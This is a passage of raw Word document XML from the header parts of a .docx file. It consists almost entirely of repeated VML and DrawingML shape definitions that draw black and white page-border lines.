                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50901" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50902" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50903" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50904" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50905" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50906" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50907"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F6423" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10669"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="74B738CA" wp14:editId="340AA035">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6955536" cy="74676"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="46980" name="Group 46980"/>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260" name="Shape 5026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1" name="Shape 5026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2" name="Shape 5026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63" name="Shape 5026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64" name="Shape 5026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5" name="Shape 5026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6" name="Shape 5026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67" name="Shape 5026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68" name="Shape 5026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9" name="Shape 50269"/>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0" name="Shape 5027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71" name="Shape 5027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2" name="Shape 50272"/>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73" name="Shape 5027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4" name="Shape 5027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5" name="Shape 50275"/>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6" name="Shape 50276"/>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77" name="Shape 50277"/>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78" name="Shape 50278"/>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9" name="Shape 5027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0" name="Shape 50280"/>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81" name="Shape 50281"/>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282" name="Shape 50282"/>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80" style="width:547.68pt;height:5.88pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="69555,746">
              <v:shape id="Shape 50283" style="position:absolute;width:91;height:746;left:0;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50284" style="position:absolute;width:746;height:91;left:0;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50285" style="position:absolute;width:91;height:655;left:91;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50286" style="position:absolute;width:655;height:91;left:91;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50287" style="position:absolute;width:381;height:563;left:182;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50288" style="position:absolute;width:563;height:381;left:182;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50289" style="position:absolute;width:91;height:182;left:563;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50290" style="position:absolute;width:182;height:91;left:563;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50291" style="position:absolute;width:91;height:91;left:655;top:655;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50292" style="position:absolute;width:68061;height:91;left:746;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50293" style="position:absolute;width:68061;height:91;left:746;top:91;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50294" style="position:absolute;width:68061;height:381;left:746;top:182;" coordsize="6806184,38100" path="m0,0l6806184,0l6806184,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50295" style="position:absolute;width:68061;height:91;left:746;top:563;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50296" style="position:absolute;width:68061;height:91;left:746;top:655;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50297" style="position:absolute;width:91;height:746;left:69463;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50298" style="position:absolute;width:746;height:91;left:68808;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50299" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50300" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50301" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50302" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50303" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50304" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50305"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0A327" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10592"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="601D4A68" wp14:editId="5EBC627A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>379476</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6806184" cy="9144"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47269" name="Group 47269"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6806184" cy="9144"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6806184" cy="9144"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="50446" name="Shape 50446"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0"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69" style="width:535.92pt;height:0.719971pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:29.88pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="68061,91">
              <v:shape id="Shape 50447" style="position:absolute;width:68061;height:91;left:0;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l680618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C1953" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10592"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7C1AD555" wp14:editId="2C77171D">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6955536" cy="74676"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47207" name="Group 47207"/>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400" name="Shape 5040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1" name="Shape 5040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2" name="Shape 5040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03" name="Shape 5040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04" name="Shape 5040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5" name="Shape 5040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6" name="Shape 5040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07" name="Shape 5040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08" name="Shape 5040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9" name="Shape 50409"/>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0" name="Shape 5041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1" name="Shape 5041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2" name="Shape 50412"/>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3" name="Shape 5041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4" name="Shape 5041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6" name="Shape 50416"/>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7" name="Shape 50417"/>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8" name="Shape 50418"/>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9" name="Shape 5041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1" name="Shape 50421"/>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2" name="Shape 50422"/>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07" style="width:547.68pt;height:5.88pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="69555,746">
              <v:shape id="Shape 50423" style="position:absolute;width:91;height:746;left:0;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50424" style="position:absolute;width:746;height:91;left:0;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50425" style="position:absolute;width:91;height:655;left:91;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50426" style="position:absolute;width:655;height:91;left:91;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50427" style="position:absolute;width:381;height:563;left:182;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50428" style="position:absolute;width:563;height:381;left:182;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50429" style="position:absolute;width:91;height:182;left:563;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50430" style="position:absolute;width:182;height:91;left:563;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50431" style="position:absolute;width:91;height:91;left:655;top:655;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50432" style="position:absolute;width:68061;height:91;left:746;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50433" style="position:absolute;width:68061;height:91;left:746;top:91;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50434" style="position:absolute;width:68061;height:381;left:746;top:182;" coordsize="6806184,38100" path="m0,0l6806184,0l6806184,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50435" style="position:absolute;width:68061;height:91;left:746;top:563;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50436" style="position:absolute;width:68061;height:91;left:746;top:655;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50437" style="position:absolute;width:91;height:746;left:69463;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50438" style="position:absolute;width:746;height:91;left:68808;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50439" style="position:absolute;width:91;height:655;left:69372;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50440" style="position:absolute;width:655;height:91;left:68808;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50441" style="position:absolute;width:381;height:563;left:68991;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50442" style="position:absolute;width:563;height:381;left:68808;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50443" style="position:absolute;width:91;height:182;left:68900;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50444" style="position:absolute;width:182;height:91;left:68808;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50445"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A3868" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10592"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65AB4E89" wp14:editId="77F0CA0A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>379476</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6806184" cy="9144"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47167" name="Group 47167"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                  <wpg:wgp>
                    <wpg:cNvGrpSpPr/>
                    <wpg:grpSpPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6806184" cy="9144"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6806184" cy="9144"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="50398" name="Shape 50398"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0"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67" style="width:535.92pt;height:0.719971pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:29.88pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="68061,91">
              <v:shape id="Shape 50399" style="position:absolute;width:68061;height:91;left:0;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l680618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45CED" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1340" w:right="10583"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E3BC39B" wp14:editId="25CBCDB4">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>304800</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6955536" cy="74676"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="47434" name="Group 47434"/>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540" name="Shape 5054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1" name="Shape 5054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2" name="Shape 5054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3" name="Shape 5054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4" name="Shape 5054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5" name="Shape 5054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6" name="Shape 5054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7" name="Shape 5054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8" name="Shape 5054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9" name="Shape 50549"/>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0" name="Shape 50550"/>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1" name="Shape 50551"/>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2" name="Shape 50552"/>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3" name="Shape 50553"/>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4" name="Shape 50554"/>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5" name="Shape 50555"/>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7" name="Shape 50557"/>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8" name="Shape 50558"/>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9" name="Shape 50559"/>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0" name="Shape 50560"/>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1" name="Shape 50561"/>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2" name="Shape 50562"/>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34" style="width:547.68pt;height:5.88pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:24pt;mso-position-vertical-relative:page;margin-top:24pt;" coordsize="69555,746">
              <v:shape id="Shape 50563" style="position:absolute;width:91;height:746;left:0;top:0;" coordsize="9144,74676" path="m0,0l9144,0l9144,74676l0,74676l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50564" style="position:absolute;width:746;height:91;left:0;top:0;" coordsize="74676,9144" path="m0,0l74676,0l74676,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50565" style="position:absolute;width:91;height:655;left:91;top:91;" coordsize="9144,65532" path="m0,0l9144,0l9144,65532l0,65532l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50566" style="position:absolute;width:655;height:91;left:91;top:91;" coordsize="65532,9144" path="m0,0l65532,0l65532,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50567" style="position:absolute;width:381;height:563;left:182;top:182;" coordsize="38100,56388" path="m0,0l38100,0l38100,56388l0,56388l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50568" style="position:absolute;width:563;height:381;left:182;top:182;" coordsize="56388,38100" path="m0,0l56388,0l56388,38100l0,38100l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50569" style="position:absolute;width:91;height:182;left:563;top:563;" coordsize="9144,18288" path="m0,0l9144,0l9144,18288l0,18288l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50570" style="position:absolute;width:182;height:91;left:563;top:563;" coordsize="18288,9144" path="m0,0l18288,0l18288,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50571" style="position:absolute;width:91;height:91;left:655;top:655;" coordsize="9144,9144" path="m0,0l9144,0l9144,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50572" style="position:absolute;width:68061;height:91;left:746;top:0;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#000000"/>
              </v:shape>
              <v:shape id="Shape 50573" style="position:absolute;width:68061;height:91;left:746;top:91;" coordsize="6806184,9144" path="m0,0l6806184,0l6806184,9144l0,9144l0,0">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#ffffff"/>
              </v:shape>
              <v:shape id="Shape 50574" style="position:absolute;width:68061;height:381;left:746;top:182;" coordsize="6806184,38100" path="m0,0l6806184,0l6806184,38100l0,38100l0,0">
